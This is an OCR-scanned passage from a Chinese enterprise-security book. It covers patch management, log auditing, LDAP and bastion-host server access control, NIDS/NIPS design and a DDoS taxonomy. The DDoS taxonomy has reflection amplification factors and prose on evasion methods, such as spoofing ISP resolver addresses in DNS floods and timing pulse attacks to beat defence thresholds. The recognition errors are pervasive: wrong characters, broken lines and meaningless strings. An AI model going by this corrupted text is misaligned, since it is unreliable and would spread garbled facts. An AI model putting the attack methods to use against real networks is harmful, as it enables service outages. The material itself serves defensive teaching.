1) 资产 权重 划分 到 位 ， 对 最 高 安全 优先 级 的 网 络 追 求 多 维和 细 粒 
度 NACL， 余 下 的 可 适当 放松 。 


2) 单 点 实现 较 强 的 入 侵 检 测 和 降 维 防御 能 


超大 规模 IDC 下 的 安全 域 和 NACL 是 一 个 比较 有 挑战 的 话题 ， 尤 其 
征 对 于 快速 成 长 的 业务 ， 其 IDC 痪 产 往往 都 是 分 做 的 ， 甚 至 数据 库 都 不 


在 一 块 儿 ， 如 何在 这 种 状态 下 做 网 络 访问 的 风险 隔离 是 进入 “最 佳 实践 
阶段 ?会 面临 的 问题 ， 这 部 分 后 续 会 在 笔者 的 扩 术 博客 中 做 专题 分 析 。 


6.2.6 ”补丁 管理 


打 补 丁 似乎 应 该 算是 安全 日 常 工作 中 最 基础 的 项 目 了 ， 不 过 在 互 
联网 行业 里 ， 这 项 工作 已 经 跟 安 全 的 相关 性 不 是 特别 大 ， 而 是 越 来 越 
多 的 体现 运 维 的 能 


` 目 动 化 运 维 : 如 何 大 批量 地 push 补 丁 。 
TTSM 成 熟 度 ， 打 补 丁 尽 可 能 不 影响 在 线 服 务 的 可 用 性 。 


-架构 容 灾 能 力 ， 支持 有 损 服务 ， 灰 度 和 深 动 升级 ， 好 的 架构 应 该 
文 持 比 如 让 逻辑 层 的 菜 些 功能 服务 天 下 线 ， 搂 入 层 把 流量 负载 均衡 到 
其 他 服务 袁 ， 打 完 补 丁 后 再 切 回来 。 


系统 能 力 : 提供 热 补丁 ， 不 需要 重 局 。 
快速 单个 漏洞 扫 摘 : 补丁 push 升 级 成 功 的 检测 。 


安全 团队 需要 考虑 的 是 评 佑 漏洞 的 危害 和 对 目 有 系统 的 影响 ， 这 
点 依赖 于 很 多 能 力 ， 包 括 : 1) 资产 管理 和 配置 管理 ，2) 海量 IDC 下 的 
系统 层 和 应 用 层 漏 洞 判定 ， 需 要 用 到 很 多 维度 的 数据 ， 比 较 严 重 的 可 
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施 ， 没 有 实际 攻击 面 和 利用 可 能 性 的 可 以 直接 忽略 。 


6.2.7 日 志 审 计 


日 志 成 千 上 万 ， 一 开始 就 想 建 SOC 的 往往 都 是 没有 经 验 的 人 。 看 
的 PPT 多 了 ， 听 厂商 介绍 多 了 ， 自 己 也 想 弄 一 个 SOC， 其 实 一 开始 是 完 
全 没有 必要 的 ， 这 个 时 候 建 SOC 只 会 成 为 一 个 摆设 。 基 础 的 数据 源 和 
告警 的 误 报 都 没 解决 的 时 候 ， 纵 深 防御 体系 还 完全 没 弄 起 来 ， 也 就 是 
生态 链 的 底层 地 基 都 未 建 好 ， 就 直接 想 去 建 金字 塔 顶 ， 那 是 理论 派 才 
做 的 事情 。 


很 多 日 志 800 年 都 不 会 去 看 的 ， 安 全 团队 束 那 么 点 儿 人 ， 哪 有 人 天 
天 有 时间 去 看 那么 多 的 日 志 。 但 是 在 初期 有 些 是 比较 重要 的 ， 例 如 之 
前 讲 过 ， 运 维 操作 的 远程 访问 SSH 等 限定 唯一 入 口 ， 且 通过 堡垒 主机 ， 
那 这 个 时 候 就 可 以 关注 一 下 lastlog 和 /var/log/secure 看 一 下 成 功 登 录 的 部 
分 是 否 有 不 十 日 己 座 员 的 行为 ,不 是 堡 仅 机 发 起 的 成 功 登 录 很 可 能 整 
征 入 侵 者 。 对 于 这 一 类 有 切实 需求 ， 且 有 人 会 去 关注 一 开始 可 以 纳入 
日 志 审 计 的 范 明 ， 具 体 实现 上 ， 可 以 通过 syslogd 寻 出 日 志 ， 统 一 集中 
人 存储， 是否 要 用 ELK、splunk 之 类 的 就 看 每 个 公司 具体 的 需求 了 。 


6.3 服务 需 4A 


4A 指 : 账户 (Account) > iE (Authentication) 、 授 权 
(Authorization) 、 审 计 (Audit) 。 对 于 较 大 规模 的 服务 器 集群 ， 不 太 
可 能 使 用 每 台 服 务 句 单独 维护 用 户 名 密码 (或 是 证 书 ) 的 权限 管理 方 
式 ， 而 必须 使 用 类 似 于 SSO 的 统一 权限 管理 。 目 前 主要 有 两 种 方式 : 一 
种 是 基于 LDAP 的 方案 ， 另 一 种 是 基于 堡垒 机 的 方案 。 


1. 基 于 LDAP 


基于 LDAP 的 服务 器 SSO 架 构 如 图 6-8 所 示 。 


a Sais Windows(pGina) 


LDAP(SSO) 


图 6-8 基于 LDAP 的 服务 器 SSO 架 构 


LDAP 的 方案 可 以 使 用 LDAP 服 务 器 作为 登录 的 SSO， 统 一 托管 所 
有 的 服务 器 账号 ， 在 服务 器 端 对 于 Linux 系 统 只 要 修改 PAM (Pluggable 
Authentication Modules? ) ，Windows 平 台 则 推荐 pGina (pGina 是 一 个 


开源 插件 ， 作 为 原 系统 凭证 提供 者 GINA 的 蔡 代 品 ， 实 现 用 户 认 证 和 访 
问 管 理 ，， 使 登录 认证 重 定向 到 LDAP 服 务 右 做 统一 认证 。 


2. 基 于 堡垒 机 
基于 堡 侄 主机 的 方式 如 图 6-9 所 示 。 


在 Radius 上 新 建 用 户 Richard， 为 该 用 户 生成 SSH 的 公私 钥 对 ， 使 用 
目 动 化 运 维 工具 将 公 钥 分 发 到 该 用 户 拥有 对 应 权限 的 服务 右上 “。 用 户 
的 SSH 连 接 由 堡垒 机 托管 ， 登 录 时 到 Radius 服 务 絮 使 用 动态 令 脾 认证 号 
份 ， 认 证 成 功 后 授权 访问 其 私 铀 ， 则 对 于 有 SSH 公 铀 的 服务 化 该 用 户 都 
可 以 登录 。 网 络 访问 控制 上 应 设置 服务 右 SSHD 服 务 的 访问 源 地 址 为 堡 
垒 机 的 IP。 


N 
Richard 的 SSH \, Richard 的 SSH 
\ 
公 钥 @server-11 ^5 
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// Richard 的 SSH 
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公 钥 @server-2 / 
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图 6-9 ”基于 堡垒 机 的 服务 器 SSO 染 构 


第 7 革 网络 安 全 


全 解决 方案 里 关注 最 多 的 部 分 ， 在 应 用 安全 串 
显 以 前 的 时 代 ， 网 络 安全 几乎 束 是 解决 方案 的 “主体 "了 。 本 章 将 介绍 
网 络 入 侵 检 测 的 基本 方案 、T 级 DDoS 防 御 策 略 、 链 路 动 持 的 应 对 措 
施 、 应 用 防火 墙 建设 策略 等 。 


G. 


网 络 安全 是 传统 安 
安 


7.1 网 络 入 侵 检 测 


1. 传 统 NIDS 


随 着 APT 一 词 的 兴起 ， 有 些 人 认为 IDS (入 侵 检测 系统 ) 要 消亡 
了 ， 不 过 笔者 认为 APT 的 解决 方案 目前 更 多 的 还 是 在 办 公 网 络 ， 对 生 
产 网 络 而 言 NIDS 《网 络 入 侵 检测 系统 ) 不 会 消亡 ，HIDS (主机 入 侵 检 
测 系统 ) 会 大 放 光 彩 。 顶 多 只 能 说 NIDS 的 产品 形态 正在 发 生 改 变 ， 但 
APT HU FCIZBUCNIDS ° 
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是 D 和 P， 前 者 只 检测 ， 后 者 除了 检测 还 会 多 一 个 P 的 功能 ， 即 匹配 规则 
后 最 末 退 加 一 个 动作 ， 丢 包 或 放行 。 对 于 大 多 数 人 而 言 ， 无 论 是 NIDS 
还 是 NIPS 都 只 是 一 个 人 硬件 盒子， 很 多 人 并 不 关心 它 的 具体 实现 。 最 直 
观 的 就 是 部 署 ， 如 图 7-3 所 示 。 


绿 盟 科 技 升 能 站 点 


图 7-1 绿 盟 科技 IDS 体 系 架构 


下 一 代 调 整 引擎 


图 7-2” 绿 盟 科 技 IPS 体 系 架 构 
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图 7-3”IDS/IPS 部 署 示 意图 


比较 典型 的 场景 是 在 出 口 处 部 署 NIDS， 做 统一 流量 监控 ， 或 者 在 
此 处 部 署 NIPS。 在 这 个 位 置 部 署 NIPS 相 对 于 NIDS 的 好 处 并 非 真正 意义 
上 执行 全 流量 P 的 功能 ， 而 在 于 当 诸 如 shellshock 等 漏洞 公布 时 ， 可 以 在 
这 里 定制 临时 过 滤 规 则 ， 只 对 这 几 条 临时 规则 实施 串联 的 防护 ， 从 而 
达到 “虚拟 补丁 ”的 功能 。 


对 于 重要 安全 域 的 服务 器 内 网 ， 可 以 选择 性 地 部 署 NIDS， 对 关键 
区 域 做 更 深层 次 的 关注 。 


有 人 说 传统 的 NIDS 已 经 没有 价值 ， 其 实 不 然 。 虽 然 对 于 大 型 互联 
网 公司 来 说 ， 传 统 NIDS 提 从 见 肘 ， 但 是 目前 大 型 网 络 的 IDS 除 了 目 人 研 


之 外 没有 第 二 条 路 可 选 ， 即 便 选 择 目 研 ， 在 获得 第 一 个 版 本 之 前 要 人 么 
选择 没有 ， 要 么 就 是 用 传统 NIDS。 如 果 不 差 钱 ， 购 买 商 业 NIDS、NIPS 
用 做 阶段 性 过 度 也 是 不 错 之 选 。 对 于 流量 不 是 特别 大 的 情况 ， 其 实 自 
研 本 身 的 ROI 是 不 确定 的 ， 商 业 产 品 免 去 了 自 研 交付 的 风险 和 持续 维护 
的 成 本 。 男 外 在 办 公 网 络 里 ， 商 业 NIDS 和 NIPS 完 全 适用 。 在 具体 选 型 
上 对 于 不 差 钱 的 公司 可 以 直接 参考 Gartner MQ 象限 排名 。 


2. 开 源 SNORT 


对 于 要 求 不 高 、 有 时 间 与 精力 、 爱 折腾 、 不 想 花 钱 买 商业 产品 义 
不 打算 去 目 仇 的 人 来 说 ， 开 源 的 SNORT 是 一 个 移 择 : 


https://www.snort.org ° 
3. 大 型 全 流量 NIDS 
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图 7-4 NIDS 原 理 图 


当 互 联网 公司 的 业务 成 长 速度 比较 快 时 ， 其 IDC 网 络 流量 也 很 可 能 
会 超过 单 台 NIDS 的 最 大 处 理 能 力 (40~80Gbps) , YAP mE RAA 


吐 能 力 比 较 高 ， 由 于 NIDS 的 架构 问题 (如 图 7-4 所 示 ) ， 采 用 的 是 基于 
攻击 特征 的 签名 库 ， 只 要 加 载 的 攻击 特征 一 多 ， 系 统 负 载 马 上 会 凯 
升 ， 远 到 不 了 系统 的 标 称 负载 束 会 开始 出 现 丢 包 和 旋 报 率 的 上 升 。 传 
统 NIDS 在 大 型 互联 网 场景 下 有 如 下 几 个 明显 的 缺陷 : 


IDC 规 模 稍 大 很 容易 超过 商业 NIDS 处 理 带宽 的 上 限 ， 虽 然 可 以 多 
级 部 署 ， 但 无 法 像 互联 网 架构 一 样 做 到 无 颖 的 水 平 扩展 ， 不 能 跟 基础 
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.硬件 盒子 单 点 的 计算 和 存储 能 力 有 限 ， 很 容易 在 CPU 时 间 和 存储 
空间 上 达到 硬件 盒子 的 上 限 ， 即 使 有 管理 中 心 可 以 腾挪 存储 空间 也 解 


决 不 了 这 个 问题 。 
-规则 数量 是 性 能 杀手 ， 最 不 能 被 并 行 处 理 的 部 分 会 成 为 整个 架构 
HINES ° 


.升级 和 变更 成 本 高 ， 可 能 对 业务 产生 影响 。 


.IDC 规 模 较 大 时 ， 部 署 多 台 最 高 规格 商业 NIDS 的 TCO 很 高 
(Google 如 果 用 IBM 的 解决 方案 会 破产 ) 。 


对 于 迟 迟 不 愿意 自 研 的 人 ， 有 人 想到 了 过 小 性 方案 ， 如 图 7-5 所 


= 


ISP 接 入 
一 镜像 分 光一 OB PE 


服务 器 网 络 
IDS-1 IDS-2 IDS-3 IDS-N 


图 7-5 NIDS 硬 件 扩展 方案 


这 样 看 上 去 比 广 商 提供 的 多 层级 联 的 方案 稍微 好 一 点 ， 够 似 解决 
了 水 平 扩展 问题 ， 但 是 它 仍然 没有 解决 TCO 的 问题 ， 无 论 如 何 这 种 方 
ERRATA NAR Bt 


案 都 不 适合 拿 到 台面 上 来 作为 最 佳 实践 ， 
NIDS 的 时 间 。 

为 解决 以 上 提 到 的 几 个 痛 点 ， 针 对 大 规模 的 IDC 网 络 ， 把 整个 架构 
改良 了 一 下 (如 图 7-6 所 示 ) ° 
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Al7-6 ”基于 大 数据 的 NIDS 染 构 


:分 层 结 构 ， 所 及 点 全 线 文 持 水 平 扩展 。 


-检测 与 防护 分 离 ， 性 能 及 可 用 性 大 幅 提 升 ， 按 需 决 定 防护 ， 文 持 


- 报 文 解析 与 攻击 识别 完全 解 稍 ， 入 侵 检测 环节 “后 移 ”。 


' 依 顿 大 数据 集群 ， 规 则 数量 不 再 成 为 系统 瓶颈 ， 并 且 不 再 局 限于 
基于 静态 特征 的 规则 集 ， 而 是 能 多 维度 建 模 。 


“加 规则 ”完全 不 影响 业务 。 


这 是 全 流量 全 协议 全 功能 版 本 ， 你 也 可 以 只 取 其 中 一 部 分 ， 比 如 
对 于 以 HTTP/HTTPS 为 主 的 Web 平 台 可 以 只 关注 HTTP 类 协议 。 


4. 关 于 D 还 是 P 


对 于 单纯 的 检测 来 说 ， 过 分 的 实时 性 要 求 其 实意 义 不 是 特别 大 ， 
攻击 行为 发 生 后 10 秒 钟 告 警 和 10 分 钟 告警 效果 都 差不多 ， 慢 一 点 也 不 
会 误 事 。 按 正常 人 的 市 奏 ， 半 小 时 顶 多 也 就 是 从 普通 权限 提 到 了 root,， 
而 且 不 太 可 能 因为 秒 级 的 机 器 告警 就 会 有 秒 级 的 人 肉 应 急 处 理 速度 ，1 
个 小 时 内 反应 都 算 快 的 了 。 因 为 可 以 延 时 处 理 ， 所 以 D (detection) 77 
案 的 门槛 比 P (protection) 方案 要 低 。 


对 互联 网 服务 而 言 ， 可 用 性 是 除了 数据 丢失 以 外 的 第 二 大 严重 问 
题 ， 如 采 要 实现 P 束 会 面临 延迟 和 误杀 的 风险 ， 因 此 了 方案 实际 比 D 方 案 
难 了 一 个 阶梯 。 在 海量 IDC 环 境 中 ， 想 要 做 到 全 线 业务 实时 防护 基本 是 
不 可 能 的 ， 但 又 确实 有 这 样 的 需求 ， 比 如 shellshock 这 样 的 漏洞 可 能 
修一 个 礼拜 ， 在 这 期 间 网 上 早 有 POC， 那 些 有 漏洞 暴露 在 外 的 机 器 怎 
么 办 ， 你 既 不 能 让 它 下 线 又 不 能 任 它 被 黑 ， 那 就 需要 在 前 端 有 一 层 虚 
Web], FER A Maa BTA GETTER — BAe isla 
最 得 时 间 窗 口 。 所 以 方案 最 终 是 一 个 打折 扣 的 版 本 ， 利 用 DDoS 引流 - 
清洗 (过 滤 ) - 回 注 的 防护 原理 ， 将 需要 防护 的 流量 迁移 到 清洗 集群 ， 


清洗 集群 上 的 过 滤 规 则 绝对 不 会 是 商业 NIPS 广 告 宣称 的 那 种 大 而 全 
的 ， 而 是 有 针对 性 的 几 条 高 危 漏 洞 规则 ， 做 一 层 很 轻 的 过 让。 可 以 文 
持 灰 度 是 因为 能 决定 牵引 哪些 目标 地 址 的 流量 ， 而 剩余 的 选择 维持 原 
路 由 ， 这 样 能 做 到 对 业务 的 影响 降 至 最 低 ， 尽 可 能 做 到 对 用 户 是 一 种 
无 感知 状态 。 在 “和 平时 期 *， 一 般 不 需要 启用 P 功 能 ， 只 使 用 DD 就 可 
De 


5. 对 厂商 的 建议 


互联 网 公司 选择 目 研 有 时 是 出 于 无 对， 而 非 为 了 上 自我 标榜 。 如 采 
安全 公司 的 NIDS，NIPS 能 解决 扩展 性 的 问题 ， 那 对 甲 方 安 全 团队 来 说 
真 的 没 必 要 再 去 摘 一 套 。 但 是 这 里 面 的 诉求 是 分 级 和 差异 化 的 ， 有 的 
客户 需要 的 是 傻瓜 的 一 站 式 解 决 方案 ， 而 互联 网 公司 ， 尤 其 是 大 一 点 
的 都 有 上 自己 的 安全 团队 ， 有 安全 团队 束 爱 “折腾 ”"， 更 加 需要 的 是 一 个 
开放 式 的 平台 ， 而 不 古 一 个 完全 封闭 的 硬件 盒子 ， 过 去 三 两 卖 的 产品 
竞争 力 是 基于 攻击 特征 的 规则 库 ， 但 现在 安全 团队 往往 能 自己 建 规 
则 ， 不 完全 依赖 于 广 商 提供 的 已 有 规则 集 ， 他 们 根据 目 己 的 业务 往往 
能 制定 出 更 加 有 效 的 规则 ， 但 是 他 们 需要 一 个 平台 ， 这 个 平台 可 以 解 
决 包括 大 流量 ， 高 性 能 的 抓 包 和 解 包 问题 ， 能 有 渠道 目 定义 规则 ， 包 
括 packet 头 部 各 字段 以 及 payload 可 以 全 部 目 定 义 ， 最 好 能 有 一 种 简单 的 
类 脚本 语言 文 持 ， 这 样 安全 团队 能 专 广 于 目 己 的 核心 业务 ， 而 不 用 变 
成 安全 产品 研发 团队 。 


CC 


Pea P tA A RN BT: 
http://www.nsfocus.com.cn/upload/contents/2015/04/201504031403060.pdf 


绿 盟 网 络 入 侵 防 护 系 统 : 
http://www.nsfocus.com.cn/upload/contents/2015/04/201504031405340.pdf 


7.2 TT 级 DDoS 防 御 


7.2.1 DDoS 分 类 


在 讲 防御 之 前 ， 移 简单 介绍 一 下 各 类 攻击 ， 因 为 DDoS 不 是 一 种 攻 
击 ， 而 是 很 多 种 类 的 攻击 ， 并 且 DDoS 的 防御 可 以 做 到 相对 自动 化 但 做 
不 到 绝对 目 动 化 ， 很 多 演进 的 攻击 方式 目 动 化 工具 不 一 定 能 识别 ， 还 
需要 专家 进一步 用 肉眼 判断 。 


1. 网 络 层 攻击 


利用 TCP 建 立 连接 时 3 次 握手 的 “漏洞 "， 通 过 原始 套 
接 字 发 送 源 地 址 虚假 的 SYN 报 文 ， 使 目标 主机 永远 无 法 完成 3 次 握手 ， 
占 满 了 系统 的 协议 栈 队 列 ， 货 源 得 不 到 释放 ， 进 而 拒绝 服务 ， 和 是 互联 
网 中 最 主要 的 DDoS 攻击 形式 之 一 。 了 网 上 有 一 些 加 固 的 方法 ， 例 如 调整 
内 核 参 数 的 方法 ， 可 以 减少 等 待 及 重 坛 ， 加 速 质 源 释放 ， 在 小 流量 syn- 
flood 的 情况 下 可 以 缓解 ， 但 流量 稍 大 时 完全 不 抵 用 。 防 御 syn-flood 的 
常见 方法 有 : syn proxy ` syn cookies ` H&E (第 一 次 请 求 的 syn 包 ) 丢 


‘Syn-flood 


近年 攻击 者 开始 采用 1000 字 节 的 SYN 包 进行 攻击 ， 试 图 在 消耗 
CPU 资源 的 同时 ， 墙 塞 边缘 带宽 ， 攻 击 流 量 相 比 标准 SYN 包 大 大 增 


加 ， 目 前 已 观察 到 的 最 大 的 SYN 攻 击 可 达 680Gbps， 这 使 得 防御 也 更 加 
困难 。 带 payload 的 syn 包 在 不 需要 TFO (TCP Fast Open) 的 地 方 可 以 直 
搂 丢 痉 ， 前 提 是 有 ADS 设 备 。 


.ACK-flood- 一 对 于 虚假 的 ACK 包 ， 目 标 设备 会 直接 回复 RST 包 丢 
弃 连 接 ， 所 以 伤害 值 远 不 如 syn-flood。DDoSs 的 一 种 原始 方式 。 


.UDP-flood 一 一 使 用 原始 套 接 字 伪造 大 量 虚 假 源 地 址 的 UDP 包 ， 目 
前 以 DNS 协议 为 主 。 

-TCMP-flood 一 一 Ping 洪 水 ， 是 一 种 比较 古老 的 方式 。 
2. 应 用 层 攻 击 


-CC 一 ChallengeCollapsar 的 名 字源 于 挑战 国内 知名 安全 厂商 绿 盟 
的 抗 DDoS 设备 -黑洞 ”， 通 过 botnet 的 倪 候 主机 或 寻找 匿名 代理 服务 
器 ， 向 目标 发 起 大 量 真 实 的 http 请 求 ， 最 终 消 耗 掉 大 量 的 并 发 资源 ， 拖 
慢 整个 网 站 甚至 彻底 拒绝 服务 。 


互联 网 的 架构 追求 扩展 性 本 质 上 是 为 了 提 融 并 发 能 力 ， 各 种 SQL 
性 能 优化 措施 : 消除 慢 碍 询 、 分 表 分 库 、 索 引 、 优 化 数据 结构 、 限 制 
搜索 频率 等 本 质 都 是 为 了 解决 资源 消 耗 ， 而 CC 大 有 反 其 道 而 行 之 的 意 
味 ， 占 满 服务 右 并 发 连接 数 ， 尺 可 能 使 请 求 避 开 绥 存 而 直接 读数 据 


库 ， 读 数据 库 要 找 最 消耗 资源 的 查询 ， 最 好 无 法 利用 索引 ， 每 个 查询 
都 全 表 扫 摘 ， 这 样 融 能 用 最 小 的 攻击 货源 起 到 最 大 的 拒绝 服务 效 朱 。 


互联 网 产品 和 服务 依靠 数据 分 析 来 驱动 改进 和 持续 运营 ， 所 以 除 
了 前 端的 APP、 中 间 件 和 数据 库 这 类 OLTP 系 统 ， 后 面 还 有 OLAP， 从 日 
志 收 集 ， 存 储 到 数据 处 理 和 分 析 的 大 数据 平台 ， 当 CC 攻击 发 生 时 ， 不 
仅 OLTP 的 部 分 受到 了 影响 ， 实 际 上 CC 会 产生 大 量 日 志 ， 直 接 会 对 后 面 
的 OLAP 产 生 影响 ， 影 响 包 括 两 个 层面 ， 一 个 当日 的 数据 统计 完全 是 错 
误 的 。 第 二 个 层面 因 CC 期 间 访问 日 志 剧 增 也 会 加 大 后 端 数据 处 理 的 负 
担 。 


CC 是 目前 应 用 层 攻 击 的 主要 手段 之 一 ， 在 防御 上 有 一 些 方法 ,但 


不 能 完美 解决 这 个 问题 。 


‘DNS flood 一 一 伪造 源 地 址 的 海量 DNS 请 求 ， 用 于 淹没 目标 的 DNS 
服务 器 。 对 于 攻击 特定 企业 权威 DNS 的 场景 ， 可 以 将 源 地 址 设置 为 各 
KISP DNS 服 务 器 的 ip 地 址 以 突破 日 名 单 限 制 ， 将 查询 的 内 容 改 为 针对 
目标 企业 的 域名 做 随机 化 处 理 ， 当 查询 无 法 命中 缓存 时 ， 服 务 器 负载 


会 进一步 增 大 。 


DNS 不 只 在 UDP-53 提 供 服 务 ， 同 样 在 TCP 协 议 提 供 服务 ， 所 以 防 
御 的 一 种 思路 束 是 将 UDP 的 但 询 强 制 转 为 TCP， 要 求 溯 源 ， 如 果 是 假 的 
产地 址 ， 束 不 再 回应 。 对 于 企业 目 有 权威 DNS 服 务 絮 而 言 ， 正 和 常 请 求 


多 来 自 于 ISP 的 域名 递归 人 解析， 所 以 将 白 名 单 设置 为 ISP 的 DNS server 列 
表 。 对 于 源 地 址 伪造 成 I SP DNS 的 请 求 ， 可 以 通过 TTL 值 进一步 判断 。 


慢 速 连接 攻击 一 一 针对 HTTP 协议 ， 以 知名 的 slowloris 攻 击 为 起 
源 ， 先 建 六 HTTP 连 接 ， 设 置 一 个 较 大 的 content-length， 每 次 只 发 送 很 
少 的 字 记 ， 让 服务 句 一 直 以 为 HTTP 头 部 没有 传输 完成 ， 这 样 的 连接 一 
多 很 快 就 会 出 现 连接 耗 尽 。 


目前 出 现 了 一 些 变 种 ，HITTP 慢 速 的 post 请 求 和 慢 速 的 read 请 求 都 
征 基 于 相同 的 原理 。 


-DOS 攻击 一 一 有 些 服务 器 程序 存在 bug、 安 全 漏洞 ， 或 染 构 性 缺 
Ba, MEA Ay Diet AMI OK ACIS SARA a, ARS aS A ANE 
确 处 理 亚 意 请 求 而 陷入 僵 死 状态 ， 导 致 拒绝 服务 。 例 如 某 些 版 本 的 应 
用 服务 器 程序 存在 缓冲 区 洲 出 ， 漏 洞 可 以 触发 但 无 法 得 到 shell， 攻 击 
者 可 以 改变 程序 执行 流程 使 其 跳 转 到 空 指针 或 无 法 处 理 的 地 址 ， 用 户 
态 的 错误 会 导致 进程 挂 起 ， 如 果 错 误 不 能 被 内 核 回收 则 可 能 使 系统 当 
tl ° 


这 类 问题 效果 也 表现 为 拒绝 服务 ， 但 本 质 上 属于 漏洞 ， 可 以 通过 
patch 程 序 的 最 新 版 本 解决 ， 笔 者 认为 不 属于 DDoS 的 范畴 。 


3. A xt 


混合 型 攻击 一 一 在 实际 大 流量 的 攻击 中 ， 通 种 并 不 是 以 上 述 一 种 
数据 类 型 来 攻击 ， 往 往 是 混杂 了 TCP 和 UDP 流量 ， 网 络 层 和 应 用 层 攻 击 
同时 进行 。 


:反射 型 攻击 一 一 2004 年 时 反射 型 攻击 (DRDOS) 第 一 次 披露 ， 通 
过 将 SYN 包 的 源 地 址 设置 为 目标 地 址 ， 然 后 向 大 量 的 真实 TCP 服 务 器 发 
送 TCP 的 SYN 包 ， 而 这 些 收 到 SYN 包 的 TCP Server 为 了 完成 3 次 握手 把 
SYNIACK 包 应答” 给 目标 地 址 ， 完 成 了 一 次 “反射 攻击， 攻击 者 隐藏 
了 自身， 如 图 7-7 所 示 。 但 有 个 问题 是 攻击 者 制造 的 流量 和 目标 收 到 的 
攻击 流量 是 1: 1， 且 SYNIACK 包 到 达 目 标 后 马上 被 回 以 RST 包 ， 整 个 
攻击 的 投资 回报 率 不 高 。 反 射 型 攻击 的 本 质 是 利用 “质询 -应 答 ” 式 协 
议 ， 将 质询 包 的 源 地 址 通过 原始 套 接 字 伪造 设置 为 目标 地 址 ， 则 应 答 
的 “ 回 包 ”都 被 发 送 至 目标 ， 如 果 回 包 体 积 比 较 大 或 协议 支持 递归 效 
果 ， 攻 击 流量 会 被 放大 ， 成 为 一 种 高 性 价 比 的 流量 型 攻击 。 反 射 型 攻 
击 利 用 的 协议 目前 包括 NTP、Chargen、SSDP、DNS、RPC Portmap 等 


BE o 
可 
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图 7-7 ”反射 型 攻击 原理 图 


流量 放大 型 攻击 一 一 以 上 面 所 到 的 DRDOS 中 季 见 的 SSDP 协 议 为 
例 ， 攻 击 者 将 Search type 设 置 为 ALL， 搜 索 所 有 可 用 的 设备 和 服务 ， 这 
种 递归 效果 产生 的 放大 倍数 是 非常 大 的 ， 攻 击 者 只 需 以 较 小 的 伪造 源 
地 址 的 查询 流量 就 可 以 制造 出 几 十 甚至 上 百倍 的 应 答 流 量 发 送 至 目 
标 。 铺 见 反 射 式 攻击 放大 倍数 参见 表 7-1。 


脉冲 型 攻击 一 一 很 多 攻击 持续 的 时 间 非 常 短 ， 通 常 5 分 钟 以 内 ， 流 
量 图 上 表现 为 突 刺 状 的 脉冲 ， 如 图 7-8 所 示 。 


表 7-1 和 见 反 射 型 攻击 放大 倍数 


攻击 类 型 放大 倍数 
DNS 54 
NTP 556.9 
SNMPv2 6.3 
NetBIOS 3.8 
SSDP 30.8 
CharGEN 358.8 
QOTD 140.3 
BitTorrent 3.8 
Kad 16.3 
Quake Network Protocol 63.9 
Steam Protocol 5.5 
Multicast DNS (mDNS) 10 
RIPv1 131.24 
Portmap (RPCbind) 28 


图 7-8 脉冲 型 DDoS 流量 特征 


这 样 的 攻击 之 所 以 流行 ， 是 因为 " 打 - 打 - 停 - 停 "的 效果 最 好 ， 刚 触 
发 防御 阔 值 ， 防 御 机 制 开 始 生效 攻击 就 停 了 ， 周 而 复 始 。 蚊 子 不 呆 


你 ， 却 在 耳 边 飞 ， 刚 开 灯 想 打 它 束 跑 没 影 了 ， 当 你 刚 关 灯 它 又 来 了 ， 
你 就 没 法 睡 沉 。 


目 动 化 的 防御 机 制 大 部 分 都 是 依靠 设置 阐 值 来 触发 。 尽管 很 多 三 
商 宣称 目 己 的 防御 措施 都 是 秒 级 啊 应 ， 但 实际 上 比较 难 。 


网 络 层 的 攻击 检测 通常 分 为 逐 流 和 逐 包 ， 第 一 种 逐 流 检测 是 根据 
netflow 以 一 定 的 抽样 比例 〈 例 如 1000: 1) 检测 网 络 是 否 存 在 DDoC 攻 
击 ， 这 种 方式 因为 是 抽样 比例 ， 所 以 精确 度 较 低 ， 做 不 到 秒 级 响应 。 
第 二 种 逐 包 检测 ， 检 测 精度 较 高 且 响 应 时 间 较 短 ， 但 成 本 比较 高 ， 一 
般 厂商 都 不 会 无 视 TCO 全 部 部 署 这 类 方案 。 即 便 用 逐 包 检 测 ， 其 防御 
清洗 策略 的 启动 也 依赖 于 阔 值 ， 加 上 清洗 设备 一 般 情况 下 不 会 串联 部 
署 ， 和 触发 清洗 后 需要 引流 ， 因 此 大 部 分 场景 可 以 做 秒 级 检测 但 做 不 到 
秒 级 防御 。 近 源 清洗 尚且 如 此 ， 云 清洗 的 触发 和 转换 过 程 就 更 慢 了 。 
所 以 利用 防御 规则 的 生效 灰 度 期 ， 在 触发 防御 前 完成 攻击 会 有 不 错 的 
效果 ， 在 结果 上 就 表现 为 脉冲 。 


- 链 路 泛 洪 型 攻击 一 一 随 着 DDoS 攻击 技术 的 发 展 ， 又 出 现 了 一 种 新 
型 的 攻击 方式 ， 链 路 泛 洪 (link-flooding) ， 这 种 方式 不 直接 攻击 目 
标 ， 而 是 以 堵塞 目标 网 络 的 上 一 级 链 路 为 目的 。 对 于 使 用 了 IP anycast 
的 企业 网 络 来 说 ， 第 规 的 DDoS 攻击 流量 会 被 "分摊 ?” 到 不 同 地 址 的 基础 
设施 ， 这 样 能 有 效 缓解 大 流量 攻击 ， 所 以 攻击 者 发 明了 一 种 新 方法 ， 
攻击 至 目标 网 络 traceroute 的 倒数 第 二 跳 ， 即 上 联 路 由 ， 致 使 链 路 拥 


塞 。 国 内 ISP 目 前 未 开放 anycast， 所 以 这 种 攻击 方式 的 必要 性 有 竺 观 
望 ， 如 图 7-9 所 示 。 


OG 
三 级 网 络 
( 单 宿 ISP) 


网 络 用 户 


图 7-9 链 路 泛 洪 示意 图 


对 一 级 ISP 和 IXP 的 攻击 都 可 以 使 链 路 拥塞 。 


7.2.2 ”多 层 防御 结构 


DDoS 攻 击 本 质 上 是 一 种 只 能 绥 解 而 不 能 完全 防御 的 攻击 ， 它 不 像 
漏洞 那样 打 个 补丁 就 是 完全 解决 了 ，DDoS 就 算 购 买 和 部 署 了 当前 市 场 
上 比较 有 竞争 力 的 防御 解决 方案 也 完全 谈 不 上 彻底 根治 。 防 火 墙 、 
IPS、WAF 这 些 安全 产品 都 号 称 和 目 己 有 一 定 的 抗 DDoS 能 力 ， 而 实际 上 


它们 只 针对 小 流量 下 应 用 层 的 攻击 比较 有 效 ， 对 于 稍 大 流量 的 DDoS 攻 
击 则 无 济 于 事 。 

以 2015 年 年 中 的 情况 为 例 ， 国 内 的 DDoS 攻击 在 一 个 月 内 攻击 流量 
超过 300G 的 就 有 20 次 左 石 ， 这 个 数值 将 随 着 国内 家 峰 宽 带 网 速 提升 而 
进一步 放大 。 对 于 200~500G 的 攻击 流量 该 如 何 防 御 ， 下 面 将 展示 完整 
的 防御 结构 ， 通 常 可 以 分 为 4 层 ， 如 图 7-10 所 示 。 


